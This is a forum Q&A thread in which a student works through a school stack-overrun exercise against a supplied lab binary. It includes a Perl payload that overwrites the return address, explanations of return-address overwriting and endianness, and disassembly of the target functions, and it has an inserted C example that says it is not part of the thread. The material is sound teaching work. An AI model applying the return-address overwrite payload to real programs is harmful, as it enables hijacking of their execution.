darence
asked on
C++ : Change Stack Address
Hi!
I am doing a school project: Stack Overrun.
I have an address of: 00401D00
I managed to find the last pointer.
Now I intend to write the pointer to the address.
Any idea?
My lecture notes somehow, using Perl,
converted "\x28\x13\x40" to an address: 401328
Please advise.
Cheers!
Darence
What exactly are you trying to do?
You have to use assembly language to achieve the result, and it is not recommended to do so except in very, very rare cases, e.g. exception handling where the language does not provide support for it. Another is code related to powering on and off. Another one is inside a debugger. And you have to be ***extremely*** careful of what you are doing, because the return address of/to the caller code is stored on the stack. Even main() gets called from somewhere else. I hope that is enough of a warning/discouragement to avoid the usage. Anyway, here is one way to do it. It is in the MSVC environment and for x86-based processors.
void foo() {
    // some code
    int my_esp = 0x00401328;   // assuming int is 32 bits, the width of ESP
    __asm mov esp, my_esp;     // MSVC inline assembly, x86 only: load the new stack pointer
    return;
}
ASKER
I am trying to find the return address and change the address to some place.
In this case, it's 00401D00.
I managed to find the return address, except I don't know how to point it to 00401D00.
I think I need to find the assembly language to point to 00401D00.
Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. The first thing you would need to do is find where the return address for the current function is stored, i.e. the location on the stack which stores the IP where we would go after exiting the current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location, free up any dynamic memory that you need to, and return.
ASKER
Dear jhshukla..
How can I "store" 0x00401D00 into it?
Is it just AAAAAAAAA."0x00401D00"?
Darence, what processor architecture are you coding for?
Let's say you determine that the return address for the current function is 0x01234567. How did you figure it out? What memory location did you read to get the information? Let's call (i.e. name) that memory location 'ret_addr_loc'. Now what you do is overwrite the 32-bit value (0x01234567) at that location with the new value (0x00401D00).
For x86-based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
Depending on what compiler you are using, the ways to incorporate assembly code into C++ code will differ. Look up the documentation for your compiler.
ASKER
I am using Dev-C++.
The output is a .exe file.
From my sample assignment,
to get the address 401328,
they use: "\x28\x13\x40"
Please advise.
Cheers!
Darence
can you post the code snippet?
The machine you are using is little-endian. See http://en.wikipedia.org/wiki/Endianness for details. Basically, in a group of four bytes the least significant byte is stored first, then the next most significant, and so on. E.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary, it is stored as 01010111 00100011, i.e. 0x57 0x23, in memory. So your string, when interpreted as an int, becomes 0x401328. Now recall the fact that C-style strings are null terminated. That adds a zero at the end, making a total of 4 bytes: x28 x13 x40 x00. This becomes 0x00401328 when interpreted as an integer.
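The byte-order point above, shown in working C as an added example (mine, not code from this thread or from hackme.exe): the three escaped bytes plus the C string terminator read back as 0x00401328, and the same conversion maps the addresses in the disassembly below to their in-memory byte order. The helper names are my own, and the host is assumed to be little-endian as the reply says.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Read up to 4 raw bytes as a little-endian 32-bit value: byte 0 is the
 * least significant. High bytes that are missing count as zero, which is
 * exactly what the C string terminator supplies for "\x28\x13\x40". */
static uint32_t le_bytes_to_u32(const unsigned char *b, size_t n) {
    uint32_t v = 0;
    for (size_t i = 0; i < n && i < 4; i++)
        v |= (uint32_t)b[i] << (8 * i);
    return v;
}

/* The inverse: write a 32-bit value as 4 little-endian bytes. */
static void u32_to_le_bytes(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* The lecture-notes string, terminator included: sizeof s is 4, and the
 * bytes 28 13 40 00 read back as the address 0x00401328. */
static uint32_t decode_lecture_string(void) {
    const char s[] = "\x28\x13\x40";
    return le_bytes_to_u32((const unsigned char *)s, sizeof s);
}

/* Check the byte order of this host the way the reply describes it:
 * store 0x2357 and look at which byte lands first in memory. */
static int host_is_little_endian(void) {
    uint32_t x = 0x2357;
    unsigned char b[4];
    memcpy(b, &x, sizeof b);
    return b[0] == 0x57 && b[1] == 0x23;
}

int main(void) {
    unsigned char b[4];
    printf("\"\\x28\\x13\\x40\" as int: 0x%08X\n", (unsigned)decode_lecture_string());
    u32_to_le_bytes(0x401E50, b);            /* bar4's entry in the disassembly */
    printf("0x401E50 in memory: %02X %02X %02X %02X\n", b[0], b[1], b[2], b[3]);
    printf("host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    return 0;
}
```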
ASKER
http://www.mediamax.com/darenceang/Hosted/hackme.rar
I am given this EXE file.
The main thing is using a Perl file to invoke the illegal BAR function.
Upon executing, the BAR address will be shown.
I am supposed to find the number of A's (being 41) before it goes to the return function.
I calculated it to be 20 A's, but now I do not know how to make the program GO to the BAR address.
The syntax of using it is: hackme 3219914 AAAAAAAAAAblah blah blah..
If you manage to "change" the return address to BAR,
you should get a MSG saying I HAVE BEEN HACKED.
Cheers!
Darence
ASKER
This is a sample of the Perl file I am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x50\x1E\x40";
$cmd = "hackme ".$arg;
system($cmd);
It seems that if I use this "\x50\x1E\x40",
I am able to get into a BAR4 function,
which should not be the case, as I should be getting into a BAR function.
You should be getting inside the bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. Just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n".
ASKER
Ok..
I found it..
So what can I do?
This program is supposed to GET INTO the bar0 function.
But if I know the address, how am I going to "translate" that into whatever language x50\x1E\x40 is.... :)
ASKER CERTIFIED SOLUTION
bar0:
hackme.exe Section .text (0x00401000)
0x401C90: 55 PUSH EBP ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5 MOV EBP,ESP
0x401C93: 83EC08 SUB ESP,0x8
0x401C96: 83C4F8 ADD ESP,0xF8
0x401C99: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8 ADD ESP,0xF8 ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000 PUSH 0x401C63 ; .text:Inside bar0 function. |
0x401CA6: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CAB: E8FC1E0000 CALL 0x403BAC
0x401CB0: 83C410 ADD ESP,0x10
0x401CB3: 89C0 MOV EAX,EAX
0x401CB5: 50 PUSH EAX
0x401CB6: E8B5F90000 CALL 0x411670
0x401CBB: 83C410 ADD ESP,0x10
0x401CBE: 83C4F8 ADD ESP,0xF8
0x401CC1: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8 ADD ESP,0xF8
0x401CC9: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401CCE: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CD3: E8D41E0000 CALL 0x403BAC
0x401CD8: 83C410 ADD ESP,0x10
0x401CDB: 89C0 MOV EAX,EAX
0x401CDD: 50 PUSH EAX
0x401CDE: E88DF90000 CALL 0x411670
0x401CE3: 83C410 ADD ESP,0x10
0x401CE6: C9 LEAVE
0x401CE7: C3 RET
bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55 PUSH EBP ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5 MOV EBP,ESP
0x401E53: 83EC08 SUB ESP,0x8
0x401E56: 83C4F8 ADD ESP,0xF8
0x401E59: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8 ADD ESP,0xF8
0x401E61: 68381E4000 PUSH 0x401E38 ; .text:Inside bar4 function. |
0x401E66: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E6B: E83C1D0000 CALL 0x403BAC
0x401E70: 83C410 ADD ESP,0x10
0x401E73: 89C0 MOV EAX,EAX
0x401E75: 50 PUSH EAX
0x401E76: E8F5F70000 CALL 0x411670
0x401E7B: 83C410 ADD ESP,0x10
0x401E7E: 83C4F8 ADD ESP,0xF8
0x401E81: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8 ADD ESP,0xF8
0x401E89: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401E8E: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E93: E8141D0000 CALL 0x403BAC
0x401E98: 83C410 ADD ESP,0x10
0x401E9B: 89C0 MOV EAX,EAX
0x401E9D: 50 PUSH EAX
0x401E9E: E8CDF70000 CALL 0x411670
0x401EA3: 83C410 ADD ESP,0x10
0x401EA6: C9 LEAVE
0x401EA7: C3 RET
BTW, I just figured out that 0x00401D00 is bar1. Are you, by any chance, trying to return to bar1 from bar0?